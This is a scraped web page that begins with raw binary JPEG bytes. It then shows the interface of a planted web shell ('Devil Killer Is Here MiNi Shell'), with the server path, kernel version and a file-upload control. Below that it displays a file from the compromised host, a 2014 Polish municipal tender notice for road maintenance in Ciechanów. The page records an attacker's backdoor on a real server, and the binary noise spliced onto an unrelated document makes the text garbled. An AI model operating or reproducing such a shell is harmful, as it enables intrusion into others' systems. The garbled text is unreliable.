JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141224/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141224/264139-N-2014.html

<p class="kh_header"><b>Ciechanów: Bieżące utrzymanie dróg publicznych gminnych i wewnętrznych Gminy Miejskiej Ciechanów będących w zarządzie Prezydenta Miasta Ciechanów w okresie od dnia zawarcia umowy do 31 grudnia 2015 r.</b><br>
<b>Numer ogłoszenia: 264139 - 2014; data zamieszczenia: 24.12.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Ciechanów reprezentowana przez Prezydenta Miasta Ciechanów , Plac Jana Pawła II 6, 06-400 Ciechanów, woj. mazowieckie, tel. 23 6749200, faks 23 672 29 63.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.umciechanow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Bieżące utrzymanie dróg publicznych gminnych i wewnętrznych Gminy Miejskiej Ciechanów będących w zarządzie Prezydenta Miasta Ciechanów w okresie od dnia zawarcia umowy do 31 grudnia 2015 r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest : bieżące utrzymanie dróg publicznych gminnych i 	wewnętrznych Gminy Miejskiej Ciechanów będących w zarządzie Prezydenta Miasta 	Ciechanów w okresie od dnia zawarcia umowy do 31 grudnia 2015 r. 
Szczegółowy zakres robót zgodny z pkt. 3.1.2 siwz. Ilości robót zostały określone szacunkowo na potrzeby oceny i wyboru oferty najkorzystniejszej. W związku z charakterem robót trudnym do przewidzenia ilościowo, w  miarę potrzeby zakres robót może ulec zmianie.
Roboty stanowiące przedmiot zamówienia należy wykonywać w terminach i zgodnie ze 	zleceniami jakie będą wystawiane w trakcie trwania realizacji umowy..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje zgodnie z art. 67 ust.1 pkt 6 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień  udzielenie zamówienia uzupełniającego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6, 45.23.32.52-0, 45.23.32.22-1, 45.23.31.40-2, 45.11.12.00-0, 45.23.32.20-7, 45.23.32.90-8, 45.23.31.41-9, 45.23.32.21-4, 45.23.32.90-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Wykonawca jest zobowiązany do wniesienia wadium w wysokości:
ZADANIE NR 1:  8 000  zł PLN (słownie złotych: osiem tysięcy złotych)
ZADANIE NR 2: 8 000  zł PLN (słownie złotych: osiem tysięcy złotych)
ZADANIE NR 3: 12 000  zł PLN (słownie złotych: dwanaście tysięcy złotych)
ZADANIE NR 4: 5 000  zł PLN (słownie złotych: pięć tysięcy złotych)
ZADANIE NR 5: 2 000  zł PLN (słownie złotych: dwa tysiące złotych)

2.	Wadium musi być wniesione przed upływem terminu składania ofert w jednej lub kilku następujących formach, w zależności od wyboru Wykonawcy:
a.	 pieniądzu, przelewem na rachunek bankowy: 54821300082001008888880010 w Banku    Spółdzielczym w Ciechanowie. 
b. 	poręczeniach bankowych;
c.  poręczeniach pieniężnych spółdzielczych kas oszczędnościowo-kredytowych;
d.  gwarancjach bankowych;
e.  gwarancjach ubezpieczeniowych;
f.  poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 roku o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t. jedn. Dz. U. z 2007 r. Nr 42, poz. 275).
3.	Wadium wnoszone w formie poręczeń lub gwarancji powinno być złożone 
w oryginale i musi obejmować cały okres związania ofertą.
4.	Wadium wniesione w pieniądzu przelewem na rachunek bankowy musi wpłynąć na wskazany w pkt. 2.a) rachunek bankowy Zamawiającego najpóźniej przed upływem terminu składania ofert.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia wymogu potwierdzenia powyższego warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że  zrealizował w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie przynajmniej jedno zamówienie polegające na: Zadanie 1: remoncie lub budowie/przebudowie nawierzchni chodników za kwotę co najmniej 100.000,00 zł brutto,  Zadanie 2: remoncie cząstkowym nawierzchni bitumicznych za kwotę co najmniej 120.000,00 zł brutto, Zadanie 3: remoncie nawierzchni dróg gruntowych za kwotę co najmniej  200.000,00 zł brutto, Zadanie 4: utrzymaniu oznakowania pionowego za kwotę co najmniej  100.000,00 zł  brutto, Zadanie 5: utrzymaniu oznakowania poziomego za kwotę co najmniej 50.000,00 zł  brutto,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia wymogu potwierdzenia powyższego warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadanie przez Wykonawcę  kierownika budowy i/lub robót który w imieniu Wykonawcy będzie uczestniczył w realizacji niniejszego zamówienia, który posiada kwalifikacje i uprawnienia budowlane w specjalności drogowej. (dotyczy zadania 1,2,3,4,5)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia wymogu potwierdzenia powyższego warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Wykonawca musi wykazać, że  zrealizował w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie przynajmniej jedno zamówienie polegające na: Zadanie 1: remoncie lub budowie/przebudowie nawierzchni chodników za kwotę co najmniej 100.000,00 zł brutto,  Zadanie 2: remoncie cząstkowym nawierzchni bitumicznych za kwotę co najmniej 120.000,00 zł brutto, Zadanie 3: remoncie nawierzchni dróg gruntowych za kwotę co najmniej  200.000,00 zł brutto, Zadanie 4: utrzymaniu oznakowania pionowego za kwotę co najmniej  100.000,00 zł  brutto, Zadanie 5: utrzymaniu oznakowania poziomego za kwotę co najmniej 50.000,00 zł  brutto,;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Pełnomocnictwo do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia, ewentualnie umowę o współdziałaniu, z której będzie wynikać przedmiotowe pełnomocnictwo. Pełnomocnik może być ustanowiony do reprezentowania Wykonawców w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy.

2.	Pełnomocnictwo do podpisania oferty względnie do podpisania innych dokumentów składanych wraz z ofertą, o ile prawo do ich podpisania nie wynika z innych dokumentów złożonych wraz z ofertą. Treść pełnomocnictwa musi jednoznacznie wskazywać czynności, do wykonywania, których pełnomocnik jest upoważniony
3. Formularz oferty- dodatek nr 1 do SIWZ
4. Zobowiązanie do udostępnienia niezbędnych osób, na okres korzystania z nich przy realizacji zamówienia Wzór dokumentu stanowi dodatek nr 6 do SIWZ.
5. Zobowiązanie do udostępnienia niezbędnych zasobów wiedzy i doświadczenia, na okres korzystania z nich przy realizacji zamówienia Wzór dokumentu stanowi dodatek nr 8 do SIWZ. Zobowiązanie ma określać charakter stosunku, jaki będzie łączył Wykonawcę z innym podmiotem oraz zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia.
6. Formularze cenowe na poszczególne zadania - dodatki 9 a do 9 e do SIWZ.
7. Wykaz cen materiałów na poszczególne zadania - dodatki 10 a do 10 e do SIWZ.
8. Wykaz cen sprzętu na poszczególne zadania - dodatki 11 a do 11 e do SIWZ. 
9. Zaakceptowany wzór umowy- dodatek nr 12 do SIWZ.
10. Oświadczenie nr 4- dodatek nr 13 do SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 98</li>
<li>2 - czas realizacji zlecenia - 2</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Wszelkie zmiany i uzupełnienia treści Umowy mogą być dokonywane wyłącznie w formie aneksu podpisanego przez Strony. Zamawiający dopuszcza następujące zmiany umowy:
 a) Zmiany osób realizujących przedmiot umowy na inne legitymujące się co najmniej  takim samym doświadczeniem jak wymagane w SIWZ oraz równoważnymi uprawnieniami, o których mowa w ustawie Prawo budowlane - w przypadku wystąpienia uzasadnionej potrzeby po stronie Wykonawcy, 
            b) Możliwość rezygnacji lub zmiany podwykonawców (podmiotów), na etapie   realizacji 
              Umowy, z  pomocą których Wykonawca - zgodnie z art. 26 ust. 2b ustawy pzp wykazał 
              spełnianie warunków   udziału w postępowaniu. W takim przypadku wykonawca jest 
              zobowiązany  udowodnić zamawiającemu, że inny proponowany podwykonawca, lub 
              wykonawca samodzielnie spełnia je w stopniu nie mniejszym, niż wymagany w trakcie 
             postępowania ,
c)  Zmiana podmiotu trzeciego (o którym mowa w art. 26 ust. 2b) na etapie realizacji zamówienia na podmiot spełniający warunki udziału w postępowaniu w zakresie nie mniejszym niż podmiot dotychczasowy,
d)  Zmiany terminu realizacji zamówienia ,
e)  Zmiany zakresu robót (roboty dodatkowe, zamienne, roboty pominięte w przedmiarze a przewidziane w dokumentacji projektowej niebędące robotami towarzyszącymi zawartymi w kosztach ogólnych).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.umciechanow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Ciechanów, Pl. Jana Pawła II 6, Stanowisko ds. Zamówień Publicznych , pokój 115..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.01.2015 godzina 10:00, miejsce: Oferty winny być złożone w siedzibie Zamawiającego w Ciechanowie przy ul. Wodnej 1 w Biurze Obsługi Interesanta w Biurze Podawczym na parterze budynku.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.Otwarcie ofert nastąpi w siedzibie Zamawiającego w Ciechanowie przy ul. Wodnej 1, w Sali konferencyjnej na parterze budynku w dniu 08.01.2015 r. o godzinie 10:15 czasu lokalnego. 2. Zamawiający nie przewiduje ustanowienia
dynamicznego systemu zakupów. 3. Zamawiający nie przewiduje zawarcia umowy ramowej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie 1 -bieżące utrzymanie dróg utwardzonych - remont nawierzchni chodników.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rozebranie krawężników betonowych na podsypce piaskowej	m	300,0
Rozebranie ław pod krawężniki z betonu	m3	18,0
Rozebranie obrzeży trawnikowych o wymiarach 6x20 cm na podsypce piaskowej	m	300,0
Rozebranie chodników z płyt betonowych o wymiarach 35x35x5 cm na podsypce piaskowej	m2	400,0
Rozebranie nawierzchni z betonu gr. 15 cm ręcznie	m2	100,0
Rozebranie chodników z płyt betonowych o wymiarach 50x50x7 cm na podsypce piaskowej	m2	400,0
Remonty cząstkowe nawierzchni z płyt drogowych betonowych sześciokątnych lub kwadratowych grubości 12 cm ze spoinami wypełnionymi piaskiem	m2	50,0
Remonty cząstkowe nawierzchni z kostki kamiennej nieregularnej wysokości 6 cm na podsypce piaskowej i ze spoinami wypełnionymi piaskiem	m2	300,0
Roboty ziemne wykonywane koparkami przedsiębiernymi o poj.łyżki 0.40 m3 w gr.kat. III-IV z transportem urobku na odległość do 1 km samochodami samowyładowczymi	m3	250,0
Dodatek za każdy rozpoczęty 1 km transportu ziemi samochodami samowyładowczymi po drogach o nawierzchni utwardzonej (kat.gr. I-IV) ponad 1 km	m3	250,0
Koryta gł. 10 cm wykonywane w gruntach kat. II-IV na poszerzeniach jezdni lub chodników	m2	300,0
Warstwy odsączające wykonane i zagęszczane mechanicznie o gr.10 cm	m2	1500,0
Podbudowy betonowe gr.15 cm pielęgnowane piaskiem i wodą	m2	300,0
Podbudowy betonowe gr.10 cm pielęgnowane piaskiem i wodą- z betonu B-7,5	m2	300,0
Ława pod krawężniki betonowa z oporem	m3	28,0
Krawężniki betonowe wystające o wymiarach 15x30 cm z wykonaniem ław betonowych na podsypce cementowo-piaskowej	m	400,0
Obrzeża betonowe o wymiarach 20x6 cm na podsypce piaskowej, spoiny wypełnione zaprawą cementową	m	1500,0
Obrzeża betonowe o wymiarach 30x8 cm na podsypce piaskowej, spoiny wypełnione zaprawą cementową	m	20,0
Chodniki z kostki brukowej betonowej grubości 6 cm na podsypce cementowo-piaskowej z wypełnieniem spoin piaskiem-materiał z rozbiórki	m2	600,0
Chodniki z kostki brukowej betonowej grubości 6 cm na podsypce cementowo-piaskowej z wypełnieniem spoin piaskiem	m2	800,0
Chodniki z kostki brukowej betonowej grubości 8 cm na podsypce cementowo-piaskowej z wypełnieniem spoin piaskiem	m2	800,0
Chodniki z kostki brukowej betonowej grubości 8 cm na podsypce cementowo-piaskowej z wypełnieniem spoin piaskiem	m2	100,0
Regulacja pionowa studzienek dla urządzeń podziemnych przy objętości betonu w jednym miejscu do 0.1 m3	m3	1,5
Regulacja pionowa studzienek dla urządzeń podziemnych poprzez założenie pierścieni dystansowych	szt	5,0
Regulacja pionowa studzienek dla urządzeń podziemnych poprzez założenie ramek dystansowych	szt	5,0
Wywiezienie gruzu spryzmowanego samochodami samowyładowczymi na odległość do 1 km	m3	100,0
Wywiezienie gruzu spryzmowanego samochodami samowyładowczymi na każdy następny 1 km	m3	100,0
Nawierzchnie z płyt drogowych betonowych kwadratowych grubości 12 cm, spoiny wypełnione piaskiem	m2	50,0
Regulacja pionowa studzienek dla włazów kanałowych z wymianą włazów	szt.	2,0
Rozebranie nawierzchni z mas mineralno-bitumicznych gr. 4 cm mechanicznie	m2	50,0.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.22-1, 45.23.31.42-6, 45.23.32.20-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 98</li>
<li>2. Czas realizacji zlecenia - 2</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Bieżące utrzymanie dróg utwardzonych - remonty cząstkowe masą z recyklera, 
  utrwalenie i regeneracja nawierzchni.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wyrównanie lokalnych nierówności mieszankami mineralno - bitumicznymi masą z recyklera	t	500
Remonty cząstkowe nawierzchni powierzchniowo utrwalonych przy pomocy grysów - wyboje o głębokości 1.5 cm	m2	100
Remonty cząstkowe nawierzchni powierzchniowo utrwalonych przy pomocy grysów - wyboje o głębokości 2.0 cm	m2	100
Remonty cząstkowe nawierzchni powierzchniowo utrwalonych przy pomocy grysów - wyboje o głębokości 3.0 cm	m2	200
Powierzchniowe utrwalanie nawierzchni drogowych emulsją asfaltową i grysem kamiennym o wym. 2-5 mm w ilości 8 dm3/m2	m2	500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.45-6, 45.23.32.20-7, 45.23.31.40-2, 45.23.32.52-0, 45.11.12.00-0, 45.23.32.90-8, 45.23.31.41-9.</p></li>
